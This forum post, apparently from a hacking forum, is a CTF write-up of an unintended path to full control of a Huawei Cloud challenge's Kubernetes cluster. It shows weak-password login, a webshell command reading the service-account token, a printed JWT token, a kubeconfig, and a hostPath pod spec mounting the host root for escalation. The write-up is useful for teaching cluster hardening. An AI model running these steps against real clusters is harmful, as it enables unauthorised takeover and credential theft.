Jump to content

Title: Huawei Cloud CTF cloud unexpected solution to K8s penetration actual combat

Featured Replies

Posted

Preface

Recently, I am quite interested in cloud security. I have learned the architecture and operations of k8s. I happened to encounter this game of Huawei Cloud and gained a lot.

(Even the highest authority of the platform problem cluster was obtained through unexpected expectations).

0x00 Question entrance discovery

I got the question and found that it is a site similar to providing IaaS services. I scanned a wave of directories and found several files and routes :

phpinfo.php

robots.txt

admin/

login/

Static/What's strange is that a 403 interface of the beego framework backend was found in an environment where phpinfo exists:

image-20201220213938432 Preliminary guess is that the .php file is handed over to nginx fastcgi for processing, while other routes are handed over to beego for processing.

Then we first look at the /admin route and find that there is a hidden form

image-20201220142429113 Therefore, I naturally thought of using burpsuite to blast weak passwords, and found that there is a weak password admin:admin

After successful login, two URLs are returned, download tools.zip, and guess based on the name /wsproxy is a proxy route for a websocket, and looking at the source code of tools, it is found that it is a wsproxy client program.

image-20201220142540954 At this point, we found the channel to enter the intranet.

0x01 wsproxy enter the intranet

Directly compile the tools source code obtained to obtain the client connection program

image-20201220193029128 According to the instructions for use, we can connect to the wsproxy on the title through a simple command, and the password is pass.txt (UAF) in the tools source code directory. The session is the beego session given by the question after we log in to admin.

image-20201220193124576 This will open a socks5 proxy on the local port 1080. Through this proxy, we can connect to the intranet.

0x02 phpinfo leaks k8s cluster information

Due to the name of this question Cloud, as well as the large amount of service information and k8s api-server address found in the phpinfo.php environment variable, this is a k8s cluster according to the name and value of the environment variable. And our question belongs to a pod in the k8s cluster.

image-20201220142706608

0x03 k8s infrastructure introduction

Before we continue to go deeper, we need to understand some of the infrastructure of k8s

architecture As shown in the figure above, we can see that the Kubernetes cluster is mainly divided into two parts: Master and Node, which is also a typical distributed architecture.

First, external applications interact with the Master through the HTTP interface provided by Api-Server, and before interacting with APIs, they need to go through a stage of authentication. Node consists of multiple pods, and the pod runs the containers (usually dockers), and the service (app) written is run in the containers in these pods.

Secondly, if we want to publish our pods so that they can be accessed publicly, we need to understand the service. We call the abstract method of exposing applications running on a set of Pods as network services a service. The service is generally configured with IP addresses, port mapping relationships, etc. that can be publicly accessed. Through the service, we can access the corresponding pods.

Each Node has a program kubelet called a node agent. Node reports node information to the Api-Server through this program, and accepts corresponding instructions.

It is not difficult to see from the above architecture that if we want to take down the entire cluster, from the outside, we actually need to obtain access to the REST API provided by the exposed api-server.

0x04 k8s authentication token leak + improper configuration

Through the above step, we can continue to look at the infrastructure of k8s.

We connected to the intranet through the agent given, accessed the k8s api-serverhttps://10.247.0.1:443 leaked in phpinfo. We found that the api-server was exposed to the network segment that the agent could directly access, but the direct access prompted us that 401 was not authorized, so we need to find a possible way to pass this authentication.

image-20201220142743378 According to the content in the phpinfo.php file, many services are deployed in the cluster, so we guess that all the problem containers should be orchestrated and managed through this k8s.

At the same time, when deploying the k8s cluster, the token file will be mounted to /run/secrets/kubernetes.io/serviceaccount/token in each pod container by default.

In the file, we can get this token through the shell we get from other questions.

ServiceAccount mainly contains three contents: namespace, Token and CA. namespace specifies the namespace where the pod is located, CA is used to verify the certificate of the apiserver, and token is used as authentication. They are all saved in the pod file system through mount, where the path saved by token is /var/run/secrets/kubernetes.io/serviceaccount/token, which is the result of the base64 encoding of the apiserver token through the private key.

We can obtain the API-server authentication token through the webshell that we obtained in the webshell_1 question before, and obtain the API-server authentication token

http://124.70.199.12:32003/upload/71a6e9b8-90b6-4d4f-9acd-bd91c8bbcc5e.jsp?pwd=023i=cat%20/run/secrets/kubernetes.io/serviceaccount/token image-20201220143016309At this point, we have obtained access to api-server, so it is equivalent to getting master permissions in the k8s cluster.

0x05 Obtain cluster manipulation permissions

After obtaining the permission of api-server, we can do what we want in the cluster as we want~ In fact, when we do this, we probably realize that this should be a platform vulnerability, not the expected solution to this problem. Because after obtaining the master permission, we can view/control all Pods (web questions) and get the flags of the question we want at will.

We can use the command line tool kubectl to operate on api-server.

Create a k8s.yaml configuration file, as follows, the token is the token we got above, and the server fills in the api-server address

apiVersion: v1

clusters:

- cluster:

insecure-skip-tls-verify: true

server: https://10.247.0.1

name: cluster-name

contexts:

- context:

cluster: cluster-name

namespace: test

user: admin

name: admin

current-context: admin

kind: Config

preferences: {}

users:

- name: admin

user:

token: eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZ mF1bHQtdG9rZW4tbDh4OGIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjZiYTQzN2JkLTlhN2EtNGE0ZS1iZTk2LTky MjkyMmZhNmZiOCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.XDrZLt7EeMVlTQbXNzb2rfWgTR4DPvKCpp5SftwtfGVUUdvDIOXgYtQip_lQIVOLvtApYtUpeboAecP8fTSVKwMsOLyNhI5hfy6ZrtTB6dKP0Vrl70pwpEvoSFfoI0Ej_NN PNjY3WXkCW5UG9j9uzDMW28z-crLhoIWknW-ae4oP6BNRBID-L1y3NMyngoXI2aaN9uud9M6Bh__YJi8pVxxg2eX9B4_FdOM8wu9EvfVlya502__xGMCZXXx7aHLx9_yzAPEtxUiI6oECo4HYUtyCJh_axBcNJZmwFTNEWp1DB3QcImBXr9P1qof9H1fAu-z12KLfC4-T3dnKLR9q5w

In this machine, run the following command to connect remotely to the k8s cluster of the question through the intranet agent of the question, and successfully pass the authentication.

kubectl --kubeconfig k8s.yaml cluster-info --insecure-skip-tls-verify=true image-20201220194341279 At this point, we have obtained permission to access the k8s api-server. Let's try to obtain permissions to the cluster master host.

By executing

kubectl --kubeconfig k8s.yaml version --insecure-skip-tls-verify=true image-20201220230951253 You can see that the version number of k8s is v1.15.11. This version of k8s authorization will not enable RBAC (role-based access control) by default.

In Kubernetes, there are six types of authorization: ABAC (attribute-based access control), RBAC (role-based access control), Webhook, Node, AlwaysDeny (always denied) and AlwaysAllow (always allow). Starting from version 1.6, Kubernetes enables RBAC access control policies by default. Since 1.8, RBAC has been used as a stable function.

Therefore, if the operation and maintenance do not set --authorization-mode=RBAC when building the cluster environment, then we can obtain the token for API-server authentication by taking down a pod shell in the cluster. Obviously, after the above verification, the operation and maintenance did not enable this access control when deploying the environment.

0x06 Obtain master host permissions

We can create a new pod, and mount all files in the host root directory into the pod through file mount. However, when creating a pod, we need to pull the image from the remote address, and the intranet in this question seems to be unable to leave the network, so we need to find a local image file that has been pulled.

Execute the following command to get the currently pulled images:

kubectl --kubeconfig k8s.yaml get pods --all-namespaces --insecure-skip-tls-verify=true -o jsonpath='{.image}' |\

tr -s '[[:space:]]' '\n' |\

sort |\

The result of uniq -c is as follows:

image-20201220235708354 After trying several mirrors, I found that 100.125.4.222:20202/hwofficial/coredns:1.15.6 is available

The yaml configuration is as follows:

apiVersion: v1

kind: Pod

metadata:

name: test-444

spec:

containers:

- name: test-444

image: 100.125.4.222:20202/hwofficial/coredns:1.15.6

volumeMounts:

- name: host

mountPath: /host

volumes:

- name: host

hostPath:

path: /

type: Directory above configuration mounts the root directory of the host to the /host directory in our pod, and executes the following command to create the pod in the default namespace.

kubectl --kubeconfig k8s.yaml apply -f pod.yaml -n default --insecure-skip-tls-verify=true Then enter our pod through kubectl exec to achieve control of the host file.

kubectl --kubeconfig k8s.yaml exec -it test-444 bash -n default --insecure-skip-tls-verify=true At this point, the permissions we have obtained are actually as high as those of the organizer's operation and maintenance.

0x07 Get flag

Through the above steps, we roughly understand that this is an unexpected problem. The leak of the platform configuration token and the failure to enable RBAC authorization, which leads us to easily obtain the highest permissions of the k8s cluster. Therefore, we also gain the highest permissions for all problem containers in the cluster.

In the entire cluster, we need to find pods belonging to our team in order to get the corresponding flag.

Therefore, we first query the service information used for service exposure in k8s:

kubectl --kubeconfig k8s.yaml get services -n default --insecure-skip-tls-verify=true image-20201220210356220 You can see that all services are listed, as well as cluster IP and port mapping relationships. Here we can locate the corresponding service by exposing the ports on the public network.

For example, our public network port is 30067, then we search for port 30067

image-20201220210520978 got the service where our title pod is located. Then we get the detailed information of this service to get the pod name. The command is as follows:

kubectl --kubeconfig k8s.yaml describe service guosai-34-15-service-c521637e -n default --insecure-skip-tls-verify=true image-20201220210704982 From here, we can roughly see that the app is guosai-34-15, so we go to all pods accordingly to find pods named this item.

kubectl --kubeconfig k8s.yaml describe pods guosai-34-15-service-c521637e -n default --insecure-skip-tls-verify=true By retrieving the data we obtained, we found such a pod. By comparing the information in the virtual ip and phpinfo, we can confirm that this pod is the one we are looking for.

image-20201220210832990 Therefore, we got our pod. After exec enters the pod, you can get the flag.

0x08 Summary

1.k8s configuration file: (need to get the leaked token value of the k8s cluster) k8s.yaml: apiVersion: v1

clusters:

- cluster:

insecure-skip-tls-verify: true

server: https://10.247.0.1

name: cluster-name

contexts:

- context:

cluster: cluster-name

namespace: test

user: admin

name: admin

current-context: admin

kind: Config

preferences: {}

users:

- name: admin

user:

token: eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tbDh4OGIi LCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjZiYTQzN2JkLTlhN2EtNGE0ZS1iZTk2LTkyMjkyMmZhNmZiOCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlY WNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.XDrZLt7EeMVlTQbXNzb2rfWgTR4DPvKCpp5SftwtfGVUUdvDIOXgYtQip_lQIVOLvtApYtUpeboAecP8fTSVKwMsOLyNhI5hfy6ZrtTB6dKP0Vrl70pwpEvoSFfoI0Ej_NNPNjY3WXkCW5UG9j9uzDMW28z-crLhoIWknW-ae4oP6BNRBID-L1y3NMyngoXI2aaN9uu d9M6Bh__YJi8pVxxg2eX9B4_FdOM8wu9EvfVlya502__xGMCZXXx7aHLx9_yzAPEtxUiI6oECo4HYUtyCJh_axBcNJZmwFTNEWp1DB3QcImBXr9P1qof9H1fAu-z12KLfC4-T3dnKLR9q5w2. Authenticated k8s through kubectl command (https://kubernetes.io/zh/docs/tasks/tools/install-kubectl-linux/) and got access k8s Permissions of api-server

kubectl --kubeconfig k8s.yaml cluster-info --insecure-skip-tls-verify=true3. Check the k8s version (from version 1.6, Kubernetes enables RBAC access control policy by default. Starting from 1.8, RBAC has been used as a stable function. RBAC (role-based access control) will not be enabled in version 1.6) kubectl --kubeconfig k8s.yaml version --insecure-skip-tls-verify=true4. Create a new pod, and mount all files in the root directory of the host into the pod through file mount. However, when creating a pod, you need to pull the image from the remote address. The intranet seems to be unable to exit the network. Therefore, we need to find a local image file that has been pulled down and execute the following command to obtain the currently pulled images:

kubectl --kubeconfig k8s.yaml get pods --all-namespaces --insecure-skip-tls-verify=true -o jsonpath='{.imag

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

Important Information

HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.